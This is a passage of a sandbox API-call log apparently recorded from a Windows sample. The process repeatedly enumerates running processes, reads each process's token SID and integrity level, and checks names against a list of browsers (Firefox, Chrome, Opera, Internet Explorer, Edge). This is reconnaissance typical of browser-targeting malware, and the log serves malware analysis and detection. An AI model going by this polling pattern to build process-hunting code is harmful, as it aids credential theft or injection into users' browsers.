returned 1 [0532.890] CloseHandle (hObject=0x298) returned 1 [0532.890] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0532.890] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0532.890] GetLastError () returned 0x7a [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0532.890] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0532.890] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0532.890] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0532.890] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0532.890] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0532.890] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0532.890] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0532.890] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0532.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0532.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0532.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0532.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0532.890] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0532.890] GetLastError () returned 0x7a [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0532.890] CloseHandle (hObject=0x29c) returned 1 [0532.890] CloseHandle (hObject=0x298) returned 1 [0532.890] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0532.890] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0532.890] GetLastError () returned 0x7a [0532.890] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0532.890] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0532.890] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0532.890] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0532.890] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0532.890] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0532.890] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0532.890] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0532.890] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0532.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0532.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0532.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0532.891] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0532.891] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0534.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa7f0) returned 0xc0000004 [0534.900] VirtualAlloc (lpAddress=0x0, dwSize=0xb7f0, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0534.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb7f0, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0534.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0534.901] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0534.901] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0534.901] GetLastError () returned 0x7a [0534.901] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0534.902] CloseHandle (hObject=0x29c) returned 1 [0534.902] CloseHandle (hObject=0x298) returned 1 [0534.902] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0534.902] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0534.902] GetLastError () returned 0x7a [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0534.902] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0534.902] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0534.902] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0534.902] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0534.902] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0534.902] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0534.902] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0534.902] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0534.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0534.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0534.902] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0534.902] GetLastError () returned 0x7a [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0534.902] CloseHandle (hObject=0x29c) returned 1 [0534.902] CloseHandle (hObject=0x298) returned 1 [0534.902] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0534.902] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0534.902] GetLastError () returned 0x7a [0534.902] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0534.903] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0534.903] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0534.903] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0534.903] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0534.903] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0534.903] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0534.903] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0534.903] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0534.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0534.903] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0534.903] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0534.903] GetLastError () returned 0x7a [0534.903] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0534.903] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0534.903] CloseHandle (hObject=0x29c) returned 1 [0534.903] CloseHandle (hObject=0x298) returned 1 [0534.903] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0534.903] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0534.903] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0534.903] GetLastError () returned 0x7a [0534.903] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0534.903] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0534.903] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0534.903] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0534.903] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0534.903] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0534.903] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0534.903] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0534.903] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0534.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0534.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0534.903] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0534.903] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0534.904] GetLastError () returned 0x7a [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0534.904] CloseHandle (hObject=0x29c) returned 1 [0534.904] CloseHandle (hObject=0x298) returned 1 [0534.904] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0534.904] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0534.904] GetLastError () returned 0x7a [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0534.904] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0534.904] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0534.904] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0534.904] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0534.904] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0534.904] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0534.904] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0534.904] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0534.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0534.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0534.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0534.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0534.904] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0534.904] GetLastError () returned 0x7a [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0534.904] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0534.904] CloseHandle (hObject=0x29c) returned 1 [0534.904] CloseHandle (hObject=0x298) returned 1 [0534.905] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0534.905] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0534.905] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0534.905] GetLastError () returned 0x7a [0534.905] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0534.905] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0534.905] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0534.905] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0534.905] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0534.905] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0534.905] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0534.905] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0534.905] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0534.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0534.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0534.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0534.905] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0534.905] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0536.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa7f0) returned 0xc0000004 [0536.913] VirtualAlloc (lpAddress=0x0, dwSize=0xb7f0, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0536.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb7f0, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0536.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0536.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0536.915] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0536.915] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0536.915] GetLastError () returned 0x7a [0536.915] GetTokenInformation (in: TokenHandle=0x29c, 